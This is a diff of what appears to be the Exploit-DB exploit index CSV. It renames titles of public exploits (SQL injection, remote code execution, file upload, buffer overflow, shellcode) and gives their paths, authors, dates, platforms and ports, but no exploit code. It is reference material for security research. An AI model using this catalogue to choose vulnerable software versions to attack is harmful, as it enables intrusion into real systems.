Execution",2011-07-29,Wireghoul,php,webapps,0 +35948,platforms/windows/remote/35948.html,"X360 VideoPlayer ActiveX Control 2.6 - (ASLR + DEP Bypass)",2015-01-30,Rh0,windows,remote,0 35949,platforms/windows/remote/35949.txt,"Symantec Encryption Management Server < 3.2.0 MP6 - Remote Command Injection",2015-01-30,"Paul Craig",windows,remote,0 35950,platforms/php/webapps/35950.txt,"NPDS CMS REvolution-13 - SQL Injection",2015-01-24,"Narendra Bhati",php,webapps,80 35951,platforms/linux/dos/35951.py,"Exim ESMTP 4.80 glibc gethostbyname - Denial of Service",2015-01-29,1n3,linux,dos,0 @@ -32644,7 +32652,7 @@ id,file,description,date,author,platform,type,port 36199,platforms/linux/remote/36199.txt,"Perl 5.x - Digest Module 'Digest->new()' Code Injection",2011-10-02,anonymous,linux,remote,0 36200,platforms/php/webapps/36200.txt,"Netvolution 2.5.8 - 'referer' Header SQL Injection",2011-10-03,"Patroklos Argyroudis",php,webapps,0 36201,platforms/php/webapps/36201.txt,"Phorum 5.2.18 - 'admin/index.php' Cross-Site Scripting",2011-10-03,"Stefan Schurtz",php,webapps,0 -36202,platforms/hardware/webapps/36202.py,"Seagate Business NAS 2014.00319 - Pre-Authentication Remote Code Execution",2015-03-01,"OJ Reeves",hardware,webapps,80 +36202,platforms/hardware/webapps/36202.py,"Seagate Business NAS 2014.00319 - Unauthenticated Remote Code Execution",2015-03-01,"OJ Reeves",hardware,webapps,80 36203,platforms/php/webapps/36203.txt,"vtiger CRM 5.2.1 - 'index.php' Multiple Parameter Cross-Site Scripting",2011-10-04,"Aung Khant",php,webapps,0 36204,platforms/php/webapps/36204.txt,"vtiger CRM 5.2.1 - PHPrint.php Multiple Parameter Cross-Site Scripting",2011-10-04,"Aung Khant",php,webapps,0 36205,platforms/hardware/remote/36205.txt,"SonicWALL - SessId Cookie Brute Force Weakness Admin Session Hijacking",2011-10-04,"Hugo Vazquez",hardware,remote,0 @@ -32653,7 +32661,7 @@ id,file,description,date,author,platform,type,port 36208,platforms/php/webapps/36208.txt,"vtiger CRM 5.2 - 'onlyforuser' Parameter SQL Injection",2011-10-15,"Aung Khant",php,webapps,0 36209,platforms/windows/remote/36209.html,"Microsoft Internet Explorer 8 - Select Element Memory Corruption",2011-10-11,"Ivan Fratric",windows,remote,0 36262,platforms/windows/webapps/36262.txt,"SolarWinds Orion Service - SQL Injection",2015-03-04,"Brandon Perry",windows,webapps,0 -36263,platforms/linux/remote/36263.rb,"Symantec Web Gateway 5 - restore.php Post-Authentication Command Injection",2015-03-04,Metasploit,linux,remote,443 +36263,platforms/linux/remote/36263.rb,"Symantec Web Gateway 5 - restore.php Authenticated Command Injection",2015-03-04,Metasploit,linux,remote,443 36211,platforms/windows/dos/36211.txt,"Microsoft Host Integration Server 2004-2010 - Remote Denial Of Service",2011-04-11,"Luigi Auriemma",windows,dos,0 36244,platforms/php/webapps/36244.txt,"Boonex Dolphin 6.1 - 'xml/get_list.php' SQL Injection",2011-10-19,"Yuri Goltsev",php,webapps,0 36245,platforms/php/webapps/36245.txt,"Innovate Portal 2.0 - 'cat' Parameter Cross-Site Scripting",2011-10-20,"Eyup CELIK",php,webapps,0 @@ -33074,7 +33082,7 @@ id,file,description,date,author,platform,type,port 36650,platforms/php/webapps/36650.txt,"OpenEMR 4.1 - contrib/acog/print_form.php formname Parameter Traversal Local File Inclusion",2012-02-01,"High-Tech Bridge SA",php,webapps,0 36651,platforms/php/webapps/36651.txt,"OpenEMR 4.1 - Interface/fax/fax_dispatch.php file Parameter exec() Call Arbitrary Shell Command Execution",2012-02-01,"High-Tech Bridge SA",php,webapps,0 36652,platforms/multiple/remote/36652.py,"w3tw0rk / Pitbull Perl IRC Bot - Remote Code Execution (PoC)",2015-04-06,"Jay Turla",multiple,remote,6667 -36653,platforms/jsp/remote/36653.rb,"JBoss Seam 2 - Arbitrary File Upload and Execution",2015-04-06,Metasploit,jsp,remote,8080 +36653,platforms/jsp/remote/36653.rb,"JBoss Seam 2 - Arbitrary File Upload / Execution",2015-04-06,Metasploit,jsp,remote,8080 36654,platforms/php/webapps/36654.txt,"phpLDAPadmin 1.2.2 - 'base' Parameter Cross-Site Scripting",2012-02-01,andsarmiento,php,webapps,0 36655,platforms/php/webapps/36655.txt,"phpLDAPadmin 1.2.0.5-2 - 'server_id' Parameter Cross-Site Scripting",2012-02-01,andsarmiento,php,webapps,0 36656,platforms/php/webapps/36656.txt,"GForge 5.7.1 - Multiple Cross-Site Scripting Vulnerabilities",2012-02-02,sonyy,php,webapps,0 @@ -33111,7 +33119,7 @@ id,file,description,date,author,platform,type,port 36687,platforms/php/webapps/36687.txt,"CubeCart 3.0.20 - switch.php r Parameter Arbitrary Site Redirect",2012-02-10,"Aung Khant",php,webapps,0 36688,platforms/php/webapps/36688.html,"Zen Cart 1.3.9h - 'path_to_admin/product.php' Cross-Site Request Forgery",2012-02-10,DisK0nn3cT,php,webapps,0 36689,platforms/linux/webapps/36689.txt,"BOA Web Server 0.94.8.2 - Arbitrary File Access",2000-12-19,llmora,linux,webapps,0 -36690,platforms/linux/remote/36690.rb,"Barracuda Firmware 5.0.0.012 - Post-Authentication Remote Root Exploit (Metasploit)",2015-04-09,xort,linux,remote,8000 +36690,platforms/linux/remote/36690.rb,"Barracuda Firmware 5.0.0.012 - Authenticated Remote Root Exploit (Metasploit)",2015-04-09,xort,linux,remote,8000 36691,platforms/php/webapps/36691.txt,"WordPress Windows Desktop and iPhone Photo Uploader Plugin - Arbitrary File Upload",2015-04-09,"Manish Tanwar",php,webapps,80 36692,platforms/osx/local/36692.py,"Apple Mac OSX < 10.7.5/10.8.2/10.9.5/10.10.2 - 'Rootpipe' Privilege Escalation",2015-04-09,"Emil Kvarnhammar",osx,local,0 36693,platforms/php/webapps/36693.txt,"RabbitWiki - 'title' Parameter Cross-Site Scripting",2012-02-10,sonyy,php,webapps,0 @@ -33174,7 +33182,7 @@ id,file,description,date,author,platform,type,port 36757,platforms/php/webapps/36757.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - 'index.php' base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36758,platforms/php/webapps/36758.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - admin/base_useradmin.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 36759,platforms/php/webapps/36759.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - admin/index.php base_path Parameter Remote File Inclusion",2012-02-11,indoushka,php,webapps,0 -36760,platforms/php/webapps/36760.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_ag_main.php Crafted File Upload / Arbitrary Code Execution",2012-02-11,indoushka,php,webapps,0 +36760,platforms/php/webapps/36760.txt,"Basic Analysis and Security Engine (BASE) 1.4.5 - base_ag_main.php Crafted Arbitrary File Upload / Arbitrary Code Execution",2012-02-11,indoushka,php,webapps,0 36762,platforms/php/webapps/36762.txt,"WordPress MiwoFTP Plugin 1.0.5 - Multiple Cross-Site Request Forgery Cross-Site Scripting Vulnerabilities",2015-04-14,LiquidWorm,php,webapps,80 36763,platforms/php/webapps/36763.txt,"WordPress MiwoFTP Plugin 1.0.5 - Cross-Site Request Forgery Arbitrary File Creation (Remote Code Execution)",2015-04-14,LiquidWorm,php,webapps,80 36764,platforms/php/webapps/36764.txt,"SMW+ 1.5.6 - 'target' Parameter HTML Injection",2012-02-13,sonyy,php,webapps,0 @@ -33363,7 +33371,7 @@ id,file,description,date,author,platform,type,port 36954,platforms/php/webapps/36954.txt,"WordPress Yet Another Related Posts Plugin 4.2.4 - Cross-Site Request Forgery",2015-05-08,Evex,php,webapps,80 36955,platforms/osx/remote/36955.py,"MacKeeper - URL Handler Remote Code Execution",2015-05-08,"Braden Thomas",osx,remote,0 36956,platforms/windows/remote/36956.rb,"Adobe Flash Player - domainMemory ByteArray Use-After-Free",2015-05-08,Metasploit,windows,remote,0 -36957,platforms/php/remote/36957.rb,"WordPress RevSlider 3.0.95 Plugin - Arbitrary File Upload and Execution",2015-05-08,Metasploit,php,remote,80 +36957,platforms/php/remote/36957.rb,"WordPress RevSlider 3.0.95 Plugin - Arbitrary File Upload / Execution",2015-05-08,Metasploit,php,remote,80 36958,platforms/php/webapps/36958.txt,"WordPress Ultimate Profile Builder Plugin 2.3.3 - Cross-Site Request Forgery",2015-05-08,"Kaustubh G. Padwad",php,webapps,80 36959,platforms/php/webapps/36959.txt,"WordPress ClickBank Ads Plugin 1.7 - Cross-Site Request Forgery",2015-05-08,"Kaustubh G. Padwad",php,webapps,80 36960,platforms/windows/webapps/36960.txt,"Manage Engine Asset Explorer 6.1.0 Build: 6110 - Cross-Site Request Forgery",2015-05-08,"Kaustubh G. Padwad",windows,webapps,8080 @@ -33533,7 +33541,7 @@ id,file,description,date,author,platform,type,port 37136,platforms/php/webapps/37136.txt,"Trombinoscope 3.x - 'photo.php' Server SQL Injection",2012-05-07,"Ramdan Yantu",php,webapps,0 37137,platforms/php/webapps/37137.txt,"Schneider Electric Telecontrol Kerweb 3.0.0/6.0.0 - 'kw.dll' HTML Injection",2012-05-06,phocean,php,webapps,0 37138,platforms/php/webapps/37138.txt,"Ramui Forum Script - 'query' Parameter Cross-Site Scripting",2012-05-07,3spi0n,php,webapps,0 -37139,platforms/php/webapps/37139.txt,"JibberBook 2.3 - 'Login_form.php' Authentication Security Bypass",2012-05-07,L3b-r1'z,php,webapps,0 +37139,platforms/php/webapps/37139.txt,"JibberBook 2.3 - 'Login_form.php' Authentication Bypass",2012-05-07,L3b-r1'z,php,webapps,0 37140,platforms/php/webapps/37140.html,"PHP Enter 4.1.2 - 'banners.php' PHP Code Injection",2012-05-08,L3b-r1'z,php,webapps,0 37141,platforms/hardware/remote/37141.txt,"Linksys WRT54GL Wireless Router - Cross-Site Request Forgery",2012-05-08,Kalashinkov3,hardware,remote,0 37142,platforms/php/webapps/37142.txt,"OrangeHRM 2.7 RC - plugins/ajaxCalls/haltResumeHsp.php hspSummaryId Parameter SQL Injection",2012-05-09,"High-Tech Bridge SA",php,webapps,0 @@ -33608,7 +33616,7 @@ id,file,description,date,author,platform,type,port 37219,platforms/php/webapps/37219.txt,"PHP Address Book 7.0 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-17,"Stefan Schurtz",php,webapps,0 37220,platforms/jsp/webapps/37220.txt,"OpenKM 5.1.7 - Cross-Site Request Forgery",2012-05-03,"Cyrill Brunschwiler",jsp,webapps,0 37221,platforms/jsp/webapps/37221.txt,"Atlassian JIRA FishEye 2.5.7 / Crucible 2.5.7 Plugins - XML Parsing Unspecified Security",2012-05-17,anonymous,jsp,webapps,0 -37222,platforms/asp/webapps/37222.txt,"Acuity CMS 2.6.2 - (ASP ) '/admin/file_manager/file_upload_submit.asp' Multiple Parameter File Upload / Code Execution",2012-05-21,"Aung Khant",asp,webapps,0 +37222,platforms/asp/webapps/37222.txt,"Acuity CMS 2.6.2 - (ASP ) '/admin/file_manager/file_upload_submit.asp' Multiple Parameter Arbitrary File Upload / Code Execution",2012-05-21,"Aung Khant",asp,webapps,0 37223,platforms/asp/webapps/37223.txt,"Acuity CMS 2.6.2 - '/admin/file_manager/browse.asp' path Parameter Traversal Arbitrary File Access",2012-05-21,"Aung Khant",asp,webapps,0 37224,platforms/php/webapps/37224.txt,"Yandex.Server 2010 9.0 - 'text' Parameter Cross-Site Scripting",2012-05-21,MustLive,php,webapps,0 37225,platforms/php/webapps/37225.pl,"Concrete CMS < 5.5.21 - Multiple Security Vulnerabilities",2012-05-20,AkaStep,php,webapps,0 @@ -33919,7 +33927,7 @@ id,file,description,date,author,platform,type,port 37567,platforms/php/webapps/37567.txt,"tekno.Portal 0.1b - 'link.php' SQL Injection",2012-08-01,Socket_0x03,php,webapps,0 37568,platforms/windows/dos/37568.pl,"VLC Media Player - '.3gp' File Divide-by-Zero Denial of Service",2012-08-02,Dark-Puzzle,windows,dos,0 37569,platforms/multiple/webapps/37569.txt,"ntop - 'arbfile' Parameter Cross-Site Scripting",2012-08-03,"Marcos Garcia",multiple,webapps,0 -37570,platforms/multiple/webapps/37570.py,"Zenoss 3.2.1 - Remote Post-Authentication Command Execution",2012-07-30,"Brendan Coles",multiple,webapps,0 +37570,platforms/multiple/webapps/37570.py,"Zenoss 3.2.1 - Remote Authenticated Command Execution",2012-07-30,"Brendan Coles",multiple,webapps,0 37571,platforms/multiple/webapps/37571.txt,"Zenoss 3.2.1 - Multiple Security Vulnerabilities",2012-07-30,"Brendan Coles",multiple,webapps,0 37572,platforms/php/webapps/37572.txt,"Elefant CMS - 'id' Parameter Cross-Site Scripting",2012-08-03,PuN!Sh3r,php,webapps,0 37573,platforms/multiple/webapps/37573.txt,"Worksforweb iAuto - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-08-06,"Benjamin Kunz Mejri",multiple,webapps,0 @@ -34074,7 +34082,7 @@ id,file,description,date,author,platform,type,port 37731,platforms/windows/remote/37731.py,"PCMan FTP Server 2.0.7 - PUT Command Buffer Overflow",2015-08-07,"Jay Turla",windows,remote,21 37732,platforms/win_x86/local/37732.c,"Microsoft Windows XP SP3 x86 / 2003 SP2 (x86) - 'NDProxy' Privilege Escalation (MS14-002)",2015-08-07,"Tomislav Paskalev",win_x86,local,0 37734,platforms/php/webapps/37734.html,"Microweber 1.0.3 - Persistent Cross-Site Scripting / Cross-Site Request Forgery (Add Admin)",2015-08-07,LiquidWorm,php,webapps,80 -37735,platforms/php/webapps/37735.txt,"Microweber 1.0.3 - Arbitrary File Upload Filter Bypass Remote PHP Code Execution",2015-08-07,LiquidWorm,php,webapps,80 +37735,platforms/php/webapps/37735.txt,"Microweber 1.0.3 - Arbitrary File Upload / Filter Bypass / Remote PHP Code Execution",2015-08-07,LiquidWorm,php,webapps,80 37747,platforms/windows/dos/37747.py,"Havij Pro - Crash (PoC)",2015-08-10,i_7e1,windows,dos,0 37753,platforms/php/webapps/37753.txt,"WordPress Simple Image Manipulator Plugin 1.0 - Arbitrary File Download",2015-08-10,"Larry W. Cashdollar",php,webapps,80 37738,platforms/php/webapps/37738.txt,"WordPress Job Manager Plugin 0.7.22 - Persistent Cross-Site Scripting",2015-08-07,"Owais Mehtab",php,webapps,80 @@ -34155,7 +34163,7 @@ id,file,description,date,author,platform,type,port 37808,platforms/windows/remote/37808.py,"Easy File Management Web Server 5.6 - USERID Remote Buffer Overflow",2015-08-18,"Tracy Turben",windows,remote,0 37809,platforms/php/webapps/37809.php,"Nuts CMS - Remote PHP Code Injection / Execution",2015-08-17,"Yakir Wizman",php,webapps,80 37810,platforms/windows/dos/37810.txt,"FTP Commander 8.02 - Overwrite (SEH)",2015-08-18,Un_N0n,windows,dos,0 -37811,platforms/php/webapps/37811.py,"Magento CE < 1.9.0.1 - Post-Authentication Remote Code Execution",2015-08-18,Ebrietas0,php,webapps,80 +37811,platforms/php/webapps/37811.py,"Magento CE < 1.9.0.1 - Authenticated Remote Code Execution",2015-08-18,Ebrietas0,php,webapps,80 37812,platforms/win_x86/remote/37812.rb,"Symantec Endpoint Protection Manager - Authentication Bypass / Code Execution",2015-08-18,Metasploit,win_x86,remote,8443 37813,platforms/windows/local/37813.rb,"VideoCharge Studio - Buffer Overflow (SEH)",2015-08-18,Metasploit,windows,local,0 37814,platforms/python/remote/37814.rb,"Werkzeug - Debug Shell Command Execution",2015-08-18,Metasploit,python,remote,0 @@ -34271,9 +34279,9 @@ id,file,description,date,author,platform,type,port 37927,platforms/php/webapps/37927.txt,"Netsweeper 4.0.4 - SQL Injection",2015-08-21,"Anastasios Monachos",php,webapps,0 37928,platforms/php/webapps/37928.txt,"Netsweeper 4.0.8 - SQL Injection Authentication Bypass",2015-08-21,"Anastasios Monachos",php,webapps,0 37929,platforms/php/webapps/37929.txt,"Netsweeper 4.0.8 - Authentication Bypass Issue",2015-08-21,"Anastasios Monachos",php,webapps,0 -37930,platforms/php/webapps/37930.txt,"Netsweeper 4.0.9 - Arbitrary File Upload and Execution",2015-08-21,"Anastasios Monachos",php,webapps,0 +37930,platforms/php/webapps/37930.txt,"Netsweeper 4.0.9 - Arbitrary File Upload / Execution",2015-08-21,"Anastasios Monachos",php,webapps,0 37931,platforms/php/webapps/37931.txt,"Netsweeper 3.0.6 - Authentication Bypass",2015-08-21,"Anastasios Monachos",php,webapps,0 -37932,platforms/php/webapps/37932.txt,"Netsweeper 4.0.8 - Arbitrary File Upload and Execution",2015-08-21,"Anastasios Monachos",php,webapps,0 +37932,platforms/php/webapps/37932.txt,"Netsweeper 4.0.8 - Arbitrary File Upload / Execution",2015-08-21,"Anastasios Monachos",php,webapps,0 37933,platforms/php/webapps/37933.txt,"Netsweeper 4.0.8 - Authentication Bypass",2015-08-21,"Anastasios Monachos",php,webapps,0 37934,platforms/php/webapps/37934.txt,"WordPress Shopp Plugin - Multiple Security Vulnerabilities",2012-10-05,T0x!c,php,webapps,0 37935,platforms/php/webapps/37935.txt,"Interspire Email Marketer - (Cross-Site Scripting / HTML Injection / SQL Injection) Multiple Vulnerabilities",2012-10-08,"Ibrahim El-Sayed",php,webapps,0 @@ -34307,7 +34315,7 @@ id,file,description,date,author,platform,type,port 37980,platforms/windows/dos/37980.pl,"Microsoft Excel - Denial of Service",2012-10-11,"Jean Pascal Pereira",windows,dos,0 37981,platforms/windows/dos/37981.pl,"Microsoft Paint 5.1 - '.bmp' Denial of Service",2012-10-27,coolkaveh,windows,dos,0 37982,platforms/hardware/remote/37982.pl,"TP-Link TL-WR841N Router - Local File Inclusion",2012-10-29,"Matan Azugi",hardware,remote,0 -37983,platforms/php/webapps/37983.php,"EasyITSP - 'customers_edit.php' Authentication Security Bypass",2012-10-26,"Michal Blaszczak",php,webapps,0 +37983,platforms/php/webapps/37983.php,"EasyITSP - 'customers_edit.php' Authentication Bypass",2012-10-26,"Michal Blaszczak",php,webapps,0 37984,platforms/windows/dos/37984.pl,"KMPlayer 3.0.0.1440 - '.avi' File Local Denial of Service",2012-10-26,Am!r,windows,dos,0 37985,platforms/windows/remote/37985.py,"FHFS - FTP/HTTP File Server 2.1.2 Remote Command Execution",2015-08-27,"Naser Farhadi",windows,remote,80 37986,platforms/windows/dos/37986.txt,"Xion Audio Player 1.5 build 155 - Stack Based Buffer Overflow",2015-08-27,Un_N0n,windows,dos,0 @@ -34324,7 +34332,7 @@ id,file,description,date,author,platform,type,port 37997,platforms/ios/dos/37997.txt,"Photo Transfer (2) 1.0 iOS - Denial of Service",2015-08-28,Vulnerability-Lab,ios,dos,3030 37998,platforms/php/webapps/37998.txt,"WordPress Responsive Thumbnail Slider Plugin 1.0 - Arbitrary File Upload",2015-08-28,"Arash Khazaei",php,webapps,80 37999,platforms/java/webapps/37999.txt,"Jenkins 1.626 - Cross-Site Request Forgery / Code Execution",2015-08-28,smash,java,webapps,0 -38000,platforms/php/webapps/38000.txt,"Wolf CMS - Arbitrary File Upload and Execution",2015-08-28,"Narendra Bhati",php,webapps,80 +38000,platforms/php/webapps/38000.txt,"Wolf CMS - Arbitrary File Upload / Execution",2015-08-28,"Narendra Bhati",php,webapps,80 38002,platforms/php/webapps/38002.txt,"Pluck CMS 4.7.3 - Multiple Vulnerabilities",2015-08-28,smash,php,webapps,80 38003,platforms/windows/remote/38003.py,"PCMan FTP Server 2.0.7 - GET Command Buffer Overflow",2015-08-29,Koby,windows,remote,21 38004,platforms/hardware/webapps/38004.txt,"Samsung SyncThruWeb 2.01.00.26 - SMB Hash Disclosure",2015-08-29,"Shad Malloy",hardware,webapps,80 @@ -34556,7 +34564,7 @@ id,file,description,date,author,platform,type,port 38250,platforms/multiple/remote/38250.html,"Novell Groupwise Client 8.0 - Multiple Remote Code Execution Vulnerabilities",2013-01-31,"High-Tech Bridge",multiple,remote,0 38251,platforms/php/webapps/38251.txt,"WordPress WP-Table Reloaded Plugin - 'id' Parameter Cross-Site Scripting",2013-01-24,hiphop,php,webapps,0 38252,platforms/windows/remote/38252.py,"Konica Minolta FTP Utility 1.0 - Remote Command Execution",2015-09-20,R-73eN,windows,remote,21 -38254,platforms/windows/remote/38254.rb,"Konica Minolta FTP Utility 1.00 - Post-Authentication CWD Command SEH Overflow",2015-09-21,Metasploit,windows,remote,21 +38254,platforms/windows/remote/38254.rb,"Konica Minolta FTP Utility 1.00 - Authenticated CWD Command SEH Overflow",2015-09-21,Metasploit,windows,remote,21 38255,platforms/php/webapps/38255.txt,"Kirby CMS 2.1.0 - Authentication Bypass",2015-09-22,"Dawid Golunski",php,webapps,80 38259,platforms/windows/dos/38259.py,"MASM32 11R - Crash (PoC)",2015-09-22,VIKRAMADITYA,windows,dos,0 38260,platforms/windows/remote/38260.php,"Konica Minolta FTP Utility 1.0 - Directory Traversal",2015-09-22,shinnai,windows,remote,21 @@ -34701,7 +34709,7 @@ id,file,description,date,author,platform,type,port 38404,platforms/windows/dos/38404.py,"LanWhoIs.exe 1.0.1.120 - Stack Buffer Overflow",2015-10-06,hyp3rlinx,windows,dos,0 38405,platforms/windows/dos/38405.py,"Last PassBroker 3.2.16 - Stack Based Buffer Overflow",2015-10-06,Un_N0n,windows,dos,0 38406,platforms/php/webapps/38406.txt,"PHP-Fusion v7.02.07 - Blind SQL Injection",2015-10-06,"Manuel García Cárdenas",php,webapps,0 -38407,platforms/php/webapps/38407.txt,"GLPI 0.85.5 - Remote Code Execution (via File Upload Filter Bypass)",2015-10-06,"Raffaele Forte",php,webapps,0 +38407,platforms/php/webapps/38407.txt,"GLPI 0.85.5 - Arbitrary File Upload / Filter Bypass / Remote Code Execution",2015-10-06,"Raffaele Forte",php,webapps,0 38408,platforms/php/webapps/38408.txt,"Jaow CMS - 'add_ons' Parameter Cross-Site Scripting",2013-03-23,Metropolis,php,webapps,0 38409,platforms/hardware/webapps/38409.html,"ZTE ZXHN H108N - Unauthenticated Config Download",2015-10-06,"Todor Donev",hardware,webapps,0 38410,platforms/php/webapps/38410.txt,"WordPress Banners Lite Plugin - 'wpbanners_show.php' HTML Injection",2013-03-25,"Fernando A. Lagos B",php,webapps,0 @@ -34740,7 +34748,7 @@ id,file,description,date,author,platform,type,port 38443,platforms/php/webapps/38443.txt,"Liferay 6.1.0 CE - Privilege Escalation",2015-10-11,"Massimo De Luca",php,webapps,0 38444,platforms/win_x86/dos/38444.py,"Tomabo MP4 Converter 3.10.12 < 3.11.12 - '.m3u' Denial of service (Crush Application)",2015-10-11,"mohammed Mohammed",win_x86,dos,0 38445,platforms/php/webapps/38445.txt,"Joomla Real Estate Manager Component 3.7 - SQL Injection",2015-10-11,"Omer Ramić",php,webapps,0 -38446,platforms/php/webapps/38446.html,"Dream CMS 2.3.0 - Cross-Site Request Forgery Add Extension / Arbitrary File Upload PHP Code Execution",2015-10-11,LiquidWorm,php,webapps,0 +38446,platforms/php/webapps/38446.html,"Dream CMS 2.3.0 - Cross-Site Request Forgery (Add Extension) / Arbitrary File Upload / PHP Code Execution",2015-10-11,LiquidWorm,php,webapps,0 38448,platforms/hardware/webapps/38448.txt,"F5 Big-IP 10.2.4 Build 595.0 Hotfix HF3 - Directory Traversal",2015-10-13,"Karn Ganeshen",hardware,webapps,0 38449,platforms/hardware/webapps/38449.txt,"Netgear Voice Gateway 2.3.0.23_2.3.23 - Multiple Vulnerabilities",2015-10-13,"Karn Ganeshen",hardware,webapps,0 38450,platforms/php/webapps/38450.txt,"Kerio Control 8.6.1 - Multiple Vulnerabilities",2015-10-13,"Raschin Tavakoli",php,webapps,0 @@ -34914,7 +34922,7 @@ id,file,description,date,author,platform,type,port 38626,platforms/multiple/dos/38626.py,"FileCOPA FTP Server - Remote Denial of Service",2013-07-01,Chako,multiple,dos,0 38627,platforms/android/remote/38627.sh,"Google Android - 'APK' code Remote Security Bypass",2013-07-03,"Bluebox Security",android,remote,0 38628,platforms/php/webapps/38628.txt,"HostBill - 'cpupdate.php' Authentication Bypass",2013-05-29,localhost.re,php,webapps,0 -38629,platforms/php/webapps/38629.txt,"vBulletin 5.1.x - Pre-Authentication Remote Code Execution",2015-11-05,hhjj,php,webapps,0 +38629,platforms/php/webapps/38629.txt,"vBulletin 5.1.x - Unauthenticated Remote Code Execution",2015-11-05,hhjj,php,webapps,0 38642,platforms/php/webapps/38642.txt,"Serendipity 1.6.2 - 'serendipity_admin_image_selector.php' Cross-Site Scripting",2013-07-12,"Omar Kurt",php,webapps,0 38633,platforms/multiple/remote/38633.pl,"Intelligent Platform Management Interface - Information Disclosure",2013-07-02,"Dan Farmer",multiple,remote,0 38634,platforms/ios/remote/38634.txt,"Air Drive Plus - Multiple Input Validation Vulnerabilities",2013-07-09,"Benjamin Kunz Mejri",ios,remote,0 @@ -35553,8 +35561,8 @@ id,file,description,date,author,platform,type,port 39298,platforms/php/webapps/39298.txt,"WordPress Epic Theme - 'download.php' Arbitrary File Download",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0 39299,platforms/php/webapps/39299.txt,"WordPress Antioch Theme - 'download.php' Arbitrary File Download",2014-09-08,"Ashiyane Digital Security Team",php,webapps,0 39300,platforms/php/webapps/39300.txt,"WordPress Spider Facebook Plugin - 'facebook.php' SQL Injection",2014-09-07,"Claudio Viviani",php,webapps,0 -39301,platforms/php/webapps/39301.html,"WordPress Ninja Forms 2.7.7 Plugin - Authorization Bypass",2014-09-08,Voxel@Night,php,webapps,0 -39302,platforms/php/webapps/39302.html,"WordPress WP to Twitter Plugin - Authorization Bypass",2014-09-08,Voxel@Night,php,webapps,0 +39301,platforms/php/webapps/39301.html,"WordPress Ninja Forms 2.7.7 Plugin - Authentication Bypass",2014-09-08,Voxel@Night,php,webapps,0 +39302,platforms/php/webapps/39302.html,"WordPress WP to Twitter Plugin - Authentication Bypass",2014-09-08,Voxel@Night,php,webapps,0 39303,platforms/php/webapps/39303.txt,"WordPress Xhanch My Twitter Plugin - Cross-Site Request Forgery",2014-09-08,Voxel@Night,php,webapps,0 39304,platforms/php/webapps/39304.txt,"WordPress W3 Total Cache Plugin - 'admin.php' Cross-Site Request Forgery",2014-09-08,Voxel@Night,php,webapps,0 39305,platforms/freebsd/dos/39305.py,"FreeBSD SCTP ICMPv6 - Error Processing",2016-01-25,ptsecurity,freebsd,dos,0 @@ -35928,7 +35936,7 @@ id,file,description,date,author,platform,type,port 39705,platforms/php/webapps/39705.txt,"WordPress Kento Post View Counter Plugin 2.8 - Cross-Site Request Forgery / Cross-Site Scripting",2016-04-18,cor3sm4sh3r,php,webapps,80 39706,platforms/hardware/dos/39706.txt,"TH692 Outdoor P2P HD Waterproof IP Camera - Hard Coded Credentials",2016-04-18,DLY,hardware,dos,0 39707,platforms/php/webapps/39707.txt,"Webutler CMS 3.2 - Cross-Site Request Forgery",2016-04-18,"Keerati T.",php,webapps,80 -39708,platforms/multiple/remote/39708.rb,"Novell ServiceDesk - Authenticated File Upload",2016-04-18,Metasploit,multiple,remote,80 +39708,platforms/multiple/remote/39708.rb,"Novell ServiceDesk - Authenticated Arbitrary File Upload",2016-04-18,Metasploit,multiple,remote,80 39709,platforms/php/webapps/39709.txt,"pfSense Community Edition 2.2.6 - Multiple Vulnerabilities",2016-04-18,Security-Assessment.com,php,webapps,443 39710,platforms/php/webapps/39710.txt,"modified eCommerce Shopsoftware 2.0.0.0 rev 9678 - Blind SQL Injection",2016-04-19,"Felix Maduakor",php,webapps,80 39711,platforms/php/webapps/39711.php,"PHPBack 1.3.0 - SQL Injection",2016-04-20,hyp3rlinx,php,webapps,80 @@ -36094,7 +36102,7 @@ id,file,description,date,author,platform,type,port 39965,platforms/php/webapps/39965.txt,"Tiki-Wiki CMS Calendar 14.2 / 12.5 LTS / 9.11 LTS / 6.15 - Remote Code Execution",2016-06-16,"Dany Ouellet",php,webapps,80 39879,platforms/php/webapps/39879.txt,"Joomla SecurityCheck Extension 2.8.9 - Multiple Vulnerabilities",2016-06-02,"ADEO Security",php,webapps,80 39880,platforms/jsp/webapps/39880.txt,"Liferay CE < 6.2 CE GA6 - Persistent Cross-Site Scripting",2016-06-02,"Fernando Câmara",jsp,webapps,0 -39881,platforms/php/webapps/39881.txt,"Relay Ajax Directory Manager relayb01-071706 / 1.5.1 / 1.5.3 - Unauthenticated File Upload",2016-06-02,"RedTeam Pentesting GmbH",php,webapps,80 +39881,platforms/php/webapps/39881.txt,"Relay Ajax Directory Manager relayb01-071706 / 1.5.1 / 1.5.3 - Unauthenticated Arbitrary File Upload",2016-06-02,"RedTeam Pentesting GmbH",php,webapps,80 39882,platforms/multiple/dos/39882.txt,"Websockify (C Implementation) 0.8.0 - Buffer Overflow",2016-06-02,"RedTeam Pentesting GmbH",multiple,dos,0 39884,platforms/php/webapps/39884.html,"Dream Gallery 1.0 - Cross-Site Request Forgery (Add Admin)",2016-06-06,"Ali Ghanbari",php,webapps,80 39885,platforms/multiple/shellcode/39885.c,"Linux/Windows/BSD x86_64 - execve(_/bin//sh__ {_//bin/sh__ _-c__ _cmd_}_ NULL) Execute Command Shellcode (194 bytes)",2016-06-06,odzhancode,multiple,shellcode,0 @@ -36145,7 +36153,7 @@ id,file,description,date,author,platform,type,port 39930,platforms/osx/dos/39930.c,"Apple Mac OSX - Kernel Stack Buffer Overflow in GeForce GPU Driver",2016-06-10,"Google Security Research",osx,dos,0 39931,platforms/php/webapps/39931.txt,"FRticket Ticket System - Persistent Cross-Site Scripting",2016-06-13,"Hamit Abis",php,webapps,80 39932,platforms/php/webapps/39932.html,"Viart Shopping Cart 5.0 - Cross-Site Request Forgery / Arbitrary File Upload",2016-06-13,"Ali Ghanbari",php,webapps,80 -39933,platforms/windows/local/39933.py,"Easy RM to MP3 Converter 2.7.3.700 - '.m3u' Exploit (Universal DEP + ASLR Bypass)",2016-06-13,"Fitzl Csaba",windows,local,0 +39933,platforms/windows/local/39933.py,"Easy RM to 